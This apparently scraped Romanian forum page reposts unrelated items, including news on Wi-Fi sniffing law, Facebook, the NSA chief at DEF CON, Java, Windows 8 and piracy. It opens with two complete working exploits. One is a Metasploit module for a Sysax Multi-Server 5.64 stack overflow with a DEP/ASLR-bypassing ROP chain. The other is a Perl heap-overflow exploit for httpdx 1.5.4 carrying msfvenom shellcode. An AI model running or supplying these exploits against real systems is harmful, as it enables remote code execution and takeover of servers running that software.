Sysax Multi-Server 5.64 Create Folder Buffer Overflow require 'msf/core' require 'base64' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Sysax Multi Server 5.64 Create Folder BoF', 'Description' => %q{ This module exploits a stack buffer overflow in the create folder function in Sysax Multi Server 5.64. This issue was fixed in 5.66. You must have valid credentials to trigger the vulnerability. Your credentials must also have the create folder permission and the HTTP option has to be enabled. This module will log into the server, get your a SID token and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM access. This exploit works on XP SP3, and Server 2003 SP1-SP2. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64 'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50 ], 'Version' => '$Revision:$', 'References' => [ [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x2F", }, 'Targets' => [ [ 'Windows XP SP3', { 'Rop' => false, 'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe] 'Offset' => 701, } ], [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', { 'Rop' => true, 'Ret' => 0x77baf605, # pivot 'Offset' => 701, 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] } ], ], 'Privileged' => false, 'DisclosureDate'=> 'July 29, 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [false, "URI for Multi Server", '/']), Opt::RPORT(80), OptString.new('SysaxUSER', [ true, "Username" ]), OptString.new('SysaxPASS', [ true, "Password" ]) ], self.class) end def target_url "http://#{rhost}:#{rport}#{datastore['URI']}" end def create_rop_chain() rop_gadgets = [] # All rop gadgets generated by mona.py # Thanks corelanc0d3r for making such a great tool if (target == targets[1]) # Windows 2003 rop_gadgets = [ 0x77be3adb, # POP EAX # RETN [msvcrt.dll] 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] 0x41414141, # Filler (compensate) 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] 0x77bdb896, # POP EBP # RETN [msvcrt.dll] 0x77be2265, # & push esp # ret [msvcrt.dll] 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] 0x77befbb4, # &Writable location [msvcrt.dll] 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] 0x90909090, # nop 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] ].flatten.pack("V*") end return rop_gadgets end def exploit user = datastore['SysaxUSER'] pass = datastore['SysaxPASS'] #base64 encode the credentials encodedcreds = Base64.encode64(user+"\x0a"+pass) creds = "fd="+encodedcreds connect # Login to get SID value print_status "Getting SID from #{target_url}" res = send_request_raw({ 'method'=> 'POST', 'uri' => "#{target_url}/scgi?sid=0&pid=dologin", 'data' => creds },20) #parse response for SID token sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/) print_status "Your " + sid.to_s buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') if (target['Rop']) buffer << [target['Nop']].pack('V')*16 buffer << create_rop_chain() end buffer << make_nops(15) buffer << payload.encoded #max 1299 bytes #pwnag3 post data post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n" post_data << "Content-Length: 171\r\n\r\n" post_data << "-----------------------------1190753071675116720811342231\r\n" post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n" post_data << buffer+"\r\n" post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n" referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm" send_request_raw({ 'uri' => "/" + post_data, 'version' => '1.1', 'method' => 'POST', 'referer' => referer }) handler disconnect end end Sursa

httpdx <= 1.5.4 Remote Heap Overflow #!/usr/bin/perl -w #====================================================================== # Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow # Date: 28 July 2012 # Exploit Author: st3n [at sign] funoverip [dot] net # Vendor Homepage: http://httpdx.sourceforge.net # Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download # Version: 1.5.4 # Tested on: WinXP SP1 #====================================================================== # Additional notes: # ----------------- # # - During a POST request, httpdx allocates memory with malloc(size+1), # where 'size' is actually the value of "Content-Length" HTTP header.. # All post-data will then be copied into this area using strncpy(x,y,size2), # where 'size2' = "request length" - "header length" (and not Content-Length) # # - As httpdx use it own handler function upon crash, this exploit overwrite # the first _VECTORED_EXCEPTION_NODE structure with a pointer to our shellcode. # # - The exploit works very often, but not always. In both case, httpdx crash # after the exploit. # # - WinXP SP1 # 0x77ED73B4 --> UnhandledExceptionFilter() #====================================================================== use strict; use IO::Socket::INET; # target my $host = "127.0.0.1"; # The [perl|php|py|..] page to call during the POST request. # The page must exists and the extension must be defined in the directive # "http.handlers = {...}" in httpdx.conf my $page = "/test.pl"; # Windows XP - SP1 - English # --------------------------- # ptr to the first _VECTORED_EXCEPTION_NODE structure = 0x77fc3210 - 4 my $veh_node_addr = 0x77fc320c ; # pointer to out shellcode => 0x00227664 - 8 = 0x0022765c my $sc_ptr = 0x0022765c; # shellcode # (msfvenom -p windows/exec -f perl CMD=calc.exe) my $shellcode = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" . "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" . "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" . "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" . "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" . "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" . "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" . "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" . "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" . "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" . "\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" . "\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" . "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" . "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" . "\x65\x78\x65\x00"; # flush after every write $| = 1; my $sock = IO::Socket::INET->new("$host:80"); print $sock "POST $page HTTP/1.0\r\n" . "Content-Length: 1023\r\n" . "Content-Type: text\r\n" . "Host: $host" . "\r\n" . "\r\n" . # shellcode $shellcode . # nops "\x90" x (1032-length($shellcode)) . # VEH addr pack('V', $veh_node_addr) . # ptr to shellcode pack('V', $sc_ptr) ; # if any ... while(<$sock>){ print $_; } exit; Sursa

Legal and tech specialists debate whether open Wi-Fi networks should be fair game for sniffing, but they agree that the law is currently unclear on the issue. LAS VEGAS -- Got a Wi-Fi network? If someone, say Google or the government, sniffs your open network, you may think you're legally protected. Don't be so sure. It remains unclear whether the law protects your unencrypted Wi-Fi from interception, because there are differing interpretations and lack of court precedent, Kevin Bankston, senior counsel at the Center for Democracy and Technology, said in a session at Defcon yesterday. The federal wiretap statute prohibits sniffing of contents of communications by a device unless the contents are readily accessible to the general public. If the network is password-protected you're fine. But under the definition of "readily accessible to the general public," unencrypted radio communications may not be covered, Bankston said. Years ago, Congress amended the wiretap law to include protection for unencrypted cordless phone calls because millions of people were relying on them with the expectation of privacy. The courts have not yet issued a similar ruling for Wi-Fi traffic. The question is before the courts in a case involving Google and its Street View cars, which were found to be capturing e-mail, text messages, passwords, and other data as they drove around taking pictures for Street View. During the class-action lawsuit brought against Google, the company argued that because the data was not encrypted, it was not covered by the wiretap law. The plaintiffs argued, and the court agreed, that Wi-Fi is not the type of "radio communication" Congress intended, so Wi-Fi communications may be protected under the wiretap law even if they're not encrypted, Bankston said. Google has appealed the ruling to the Ninth Circuit Court of Appeals. Meanwhile, the Federal Communications Commission fined Google $25,000 earlier this year for obstructing its investigation into the Wi-Fi sniffing matter, but the agency was unable to conclude that the company had violated the law, Bankston said. To confuse matters, the law may provide protection for some, but not all, of the wireless spectrum that's used by Wi-Fi router channels. Under one reading of the statute, only channel 11 is fully protected, while certain frequencies in channels 7 through 10 are protected, and channels 1 through 6 are not protected at all, according to Bankston. Bankston says the statute should cover open Wi-Fi networks, but he made it clear that he was not taking an official policy position on the matter. He said he and Matt Blaze, a computer science professor at the University of Pennsylvania, debated the topic to highlight the lack of clarity in the law and to start a discussion about how the law should treat the interception of open Wi-Fi. Both men said they could easily have swapped sides. "The law is a mess," Bankston said. Blaze, who does research involving radio communications interception, argued that creating a strict law could stifle innovation. For instance, it could affect how people use so-called "software-defined" radio, which uses software to select particular signals when they're broadly intercepted, he said. "There are legitimate reasons to intercept radio waves over the air," he said. "Doing what Google did has led to incredibly useful things," such as building out a location database that is an alternative to GPS. Eventually, it won't be an issue, because new routers are shipped with encryption enabled by default. But about one-quarter of the hot spots are still open, Bankston said. The problem is not just that content can be sniffed, but what snoops can do with it. "There is the possibility for mass surveillance" and tying traffic to a specific address, Bankston said. So, until this all gets sorted out it's best to use a password to protect your Wi-Fi network, and if you insist on leaving it open, set the router to channel 11. Sursa

The tension between short and long-term thinking leads to very different ideas about how Facebook ought to manage its business. I'm sure Mark Zuckerberg won't lose any sleep about Wall Street's ongoing hissy fit about Facebook -- nor should he. More about that in a moment. Following the disappointment over the company's second-quarter earnings, Facebook shares fell another 11.7 percent Friday, despite the market-lifting euphoria over the European Central Bank chief's plans to bolster the Euro. An extreme sell-off, for sure, but not surprising for a stock that's tumbled almost 38 percent since its star-crossed debut on the NASDAQ in May. Given how this outsize company has infiltrated popular culture, Facebook's fall from grace has also inspired panic. Some see it as a metaphor for the popping of the social-media investment bubble. Then there's the smug second guessing: Weren't we all dummies to ever believe in a company that does so many things so wrong? The chorus of "Zuck must go" has begun. Zuckerberg never wanted to take the company public in the first place. Circumstances -- mainly in the form of an antiquated SEC rule -- forced his hand. But that was part of the devil's bargain. So it was that during the company's earnings conference call with analysts, Zuckerberg and his key lieutenants went through the motions of pretending that what Wall Street has to say about his company matters. He knows that's a fiction -- and so do they. Wall Street's obsessed with the next quarter and Facebook's thinking about next year. Not the sort of answers you'll get from a quick-buck shyster doing a shuck-and-jive routine to jack the stock price. The suits surely wanted to hear more about what Facebook will do to reverse big slowdowns in payments growth, user growth (in the West), and U.S. ad impressions. It wasn't going to happen. Zuckerberg's refusal to play that game is hurting Facebook's credibility with a constituency that he's now stuck with. It's an uneasy marriage, but the two sides have no choice other than to get used to each other. It's not as if shareholders can force Zuckerberg out. He structured the company specifically so he can build at his pace and not take his cues from investors, whether venture capitals or Wall Street. Zuckberg's strategic mindset has helped Facebook attract some 955 million monthly users. As has been well chronicled elsewhere, Zuckerberg has had myriad opportunities to sell out. He didn't take the earlier offers because he wanted to build a business that stands the test of time. Walter Isaacson's biography last year revealed how Steve Jobs admired Zuckerberg for not selling out. With Jobs no longer around, Zuckerberg can find a kindred spirit in Jeff Bezos, another tech executive who continues to defy Wall Street and do what he knows is in the long-term interest of his company. Quarter after quarter, year after year, Wall Street complains about how much Amazon spends on infrastructure. The criticism falls on deaf ears. Bezos is thinking years ahead, planning on extending Amazon's reach far beyond its current borders. If he gets slammed by the bean counters, well, that goes with the job description. Ditto for Zuckerberg. He's a big boy and presumably has grown a thick enough skin to ignore the investing class' periodic tantrums. He's brought Facebook this far. No reason why he can't lead it to bigger things in the future -- if he stays true to himself. Sursa

NSA Chief General Keith Alexander Addresses DEF CON Attendees LAS VEGAS - DEF CON XX – General Keith Alexander, the man in charge of both the NSA and U.S. Cyber Command, delivered a talk Friday afternoon in Las Vegas that sounded like part recruitment pitch and part stump speech for cybersecurity legislation. General Alexander started his keynote by offering kudos and talking up some of DEF CON’s achievements. Dressed in casual attire, the nation’s top intelligence official made history by being the highest ranked government official to speak at DEF CON in its 20-year history. Referencing DEF CON as a whole, General Alexander called it the “world’s best cyber security community.” Unfortunately, the General seemed to talk down to many of the highly intelligent people attending his talk, recapping the history of security contributions from the hacker community – such as SNORT, IDS and IPS innovations, NMAP, etc – and the government, including Enigma and DES. He talked about the threats that organizations face online, offering what came off as a watered down version of his previous public talks, complete with mention of the significant vulnerabilities and a listing of recent security incidents. Again, most of those who came to see him speak were well aware of the security challenges that organizations of all shapes and sizes face, so it was unfortunate that the first part of his talk was spent in a type of recap and review. “If I had a drink every time Gen. Alexander said ‘cyber’ I would already be drunk,” an attendee to his talk commented on Twitter. To be fair, clearly General Alexander wasn’t attempting to talk down to the crowd, nor was he intending to overhype his situation. The aim of the talk was to build a bridge between the hacking community and the government. At one point he commented on several problems that the private and government sectors face, mentioning that if those in attendance to his talk were to focus on them for a week or so, those problems would likely be solved rather quickly. As previously mentioned on SecurityWeek, General Alexander’s talk aimed to highlight the common goals that the hacker community shares with the government, including a drive to protect personal privacy and civil liberties. As such, the recruitment drive from the NSA came as no surprise. The end of the talk included a brief Q&A, but there was nothing overly secretive reveled. General Alexander’s session wasn’t the best it could have been, but if anything he did appear to genuinely want help addressing the problems he has outlined many times before. At the same time, he may have been talking to the wrong crowd. Most of those who are here at Def Con, and who are likely to help the General address those problems, are already doing what they can. Sursa

Mai pe scurt, nu stii sa citesti..:

"Your username must be under 8 characters long." ar merge o limitare mai mare?

Google launches Fiber TV, Samsung doubles up on Apple, and eBay goes after the 18-and-under crowd. Google goes fiber and Samsung doubles up on Apple: Video here Google has launched a Fiber TV and Internet service in Kansas City, Mo., as part of a beta test. The service provides customers with 1Gbps broadband speed and fiber television that uses an interactive interface. Now while it may not get you all of your favorite channels, Google is trying to show the cable providers of the world that this is how content should be delivered. Google hopes that the technology will spark the interest of other companies who are using older communication mediums. Those who sign up for the service will get 1TB of Google Drive storage, a DVR that can record up to eight shows at once, and hold 500 hours of programming. It doesn't end there with the Google news. The latest iOS version of Google Earth is upon us and it features an insane level of 3D maps detail for some major cities, though only newer iOS devices will be able to handle the 3D features. Samsung has doubled up on Apple, selling more than twice the amount of devices during Q2. It's no secret that this can be attributed to Samsung's popular Galaxy S 3 and the calm before the iPhone 5 storm, but it's worth noting that HTC's, Motorola's, and RIM's sales combined just barely exceeded iPhone sales during the same period of time. Web-to-TV streamer Roku has successfully ended a round of funding, raising $45 million through News Corp. and British Sky Broadcasting. The money will be used to help promote the Roku brand and enter new markets. Of course it's logical to assume that the sources of the funding will influence content available on Roku products, but there's no word yet on how that will play out. eBay's president of global markets, Devin Wenig, said that the company plans on allowing children under 18 to create accounts and begin participating in certain auctions. Wenig reassured us that eBay wouldn't just be giving teenagers unfettered access to the site -- thankfully -- and will require all such accounts to be approved and monitored by a parent. This model isn't totally unheard of, though: Facebook has been considering giving kids 13 and older access to its social network. Sursa

Microsoft are o parere foarte proasta despre Java: Updatati Java sau o dezactivati! Specialistii in securitate Microsoft sustin ca, fara update-uri regulate, aplicatia este un pericol tot mai mare din cauza vulnerabilitatilor exploatate de malware. Motivele pentru care Microsoft a luat o pozitie impotriva Java tin de doua vulnerabilitati care compromit sandbox-ul Java si permit instalarea de malware. Dezactivarea temporara a plugin-ului Java din Control Panel este o alta solutie recomandata de Microsoft pentru protectia impotriva numarului tot mai mare de aplicatii malware ce exploateaza vulnerabilitatile Java. Pericolul de malware in Java poate fi eliminat complet si prin dezinstalarea completa a pluginului criticat de Microsoft. Sursa

A newly revealed patent application can be summed up simply: Apple wants to enslave every electronic device under your roof. An Apple patent application published yesterday reveals that the company has seriously looked into the notion of using near-field communication to allow its devices to take over your home, from the garage door to your gaming console. The patent was originally filed in April of 2010 and is quite lengthy, with dozens of illustrations showing Apple products (largely the iPhone) using mostly NFC to act as a remote control to turn various household devices like televisions, projectors, standalone cameras, and DVRs into their slaves. No, I'm not saying Apple has applied to patent digital slavery -- unless you already consider yourself a slave to Apple products in your house, in which case this patent could certainly tighten your iShackles while also making them a lot more comfy and amazing. The banal title of the patent is "System and Method For Simplified Control of Electronic Devices," and while that string of words is yawn-inducing, it's also pretty accurate. The idea here is for Apple to control all your home's electronic devices, right down to your sprinkler system, by connecting them to a Mac or iOS device (or both) using NFC, RFID, or whatever other means of communication is available. Many of the interactions described in the patent involve an iOS device and an Apple TV (the currently available set-top variety), including the interesting notion of being able to control games on an existing console, like an Xbox, using the iPhone touch screen. This patent application was filed a full year before the similar Android @Home concept was introduced at Google I/O in 2011 (an idea that has rarely been heard from since). Not everything Apple patents makes it to market, of course, so it's possible this vision of a household indentured to Apple could also fade away. But with a new iPhone and the spectre of an Apple HDTV on the horizon, I imagine we'll be hearing more about some of these ideas soon, and many consumers will happily embrace their new forms of bondage. Sursa

Windows 8 ar putea avea de infruntat un boicot chiar inainte de lansare. CEO-ul Valve sustine ca noul sistem de operare pe arhitectura ARM va afecta grav dezvoltatorii de jocuri. CEO-ul Valve, compania ce a dezvoltat platforma de livrare electronica de jocuri Steam, sustine ca vanzarile de jocuri PC vor fi afectate grav de introducerea Windows Store ca singura optiune de instalare de programe pe gadgeturile si PC-urile ARM (Windows RT). "Windows 8 este o catastrofa pentru toate industriile conexe PC-ului", sustine seful Valve, Gabe Newell. Faptul ca Windows Store va fi singurul distribuitor de software pe tabletele si PC-urile cu Windows RT este si mai grav atunci cand se ia considerare comisionul Microsoft: 30% din toate vanzarile. Platforma Valve Steam, ce are in momentul de fata 40 milioane de utilizatori activi pe Windows, Mac si Linux, ar putea fi exclusa complet de pe piata utilizatorilor de Windows RT, sustine Newell. Sursa

Google este hotarat sa-si pastreze suprematia pe iPhone si iPad, chiar daca Apple va include o aplicatie proprie de harti in noul iOS 6. Google Earth 7.0 pentru iOS a fost lansat la o luna dupa disponibilitatea pe platforma Android. Hartile 3D imbunatatite includ momentan doar 14 locatii majore din SUA, dar Google lucreaza de zor la extinderea acestora. Utilizatorii mai au de asteptat cel putin o luna pana la momentul in care vor putea compara Google Earth 7.0 cu noile harti Apple. Functionalitatea completa a hartilor 3D din aplicatia iOS Google Earth nu este disponibila pe toate gadgeturile Apple. Update-ul la aplicatia iOS este disponibil pentru orice gadget ce ruleaza iOS 4.2 sau un sistem de operare mai nou. Hartile 3D din Google Earth 7 necesita insa multa putere de calcul, astfel ca vor fi disponibile doar pe cele mai nou gadgeturi Apple: iPhone 4S, iPad 2 si noul iPad. Sursa

Cateva documente ce detaliaza strategia globala de lupta impotriva pirateriei au ajuns online. Industria muzicala are o strategie cu 5 arme pentru a lupta impotriva distributiei de muzica ce incalca drepturile de autor Planul de combatere a pirateriei a fost dezvoltat de Federatia Internationala a Industriei Fonografice (IFPI) si publicat de TorrentFreak si include 5 strategii separate de descurajare a distributiei de continut piratat, scrie BGR. Cele 5 strategii ale industriei muzicale impotriva pirateriei includ: inchiderea site-urilor cu muzica piratata; atacuri care impiedica functionarea corecta a distributiei continutului piratat; investigarea site-urilor suspecte; lobby impotriva pirateriei online; actiuni in justitie impotriva marilor site-uri cu continut piratat. Documentul ce detaliaza lupta impotriva pirateriei include si existenta unor acorduri cu Google, Apple si Microsoft de inlaturare a aplicatiilor mobile ce ofera continut piratat. Sursa